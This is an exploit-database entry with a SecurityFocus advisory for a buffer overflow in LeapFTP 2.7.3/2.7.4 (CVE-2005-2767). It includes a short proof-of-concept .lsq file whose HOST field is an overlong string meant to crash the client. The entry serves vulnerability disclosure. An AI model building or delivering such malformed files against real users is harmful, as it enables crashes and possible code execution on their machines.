LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow (PoC)

Author: Sowhat
type: dos
platform: windows
port: 
date_added: 2005-08-24  
date_updated: 2013-06-14  
verified: 1  
codes: CVE-2005-2767;OSVDB-18950  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 26194.txt  

source: https://www.securityfocus.com/bid/14655/info

LeapFTP client is prone to a remote buffer overflow vulnerability.

The issue arises when the client handles a malformed LeapFTP Site Queue (.lsq) file.

A remote attacker may gain unauthorized access in the context of the user running the application.

LeapFTP versions prior to 2.7.6.612 are affected by this vulnerability.

//bof.lsq

[HOSTINFO]
HOST=AAAAA...[ long string ]...AAAAA
USER=username
PASS=password

[FILES]
"1","/winis/ApiList.zip","477,839","E:\ApiList.zip"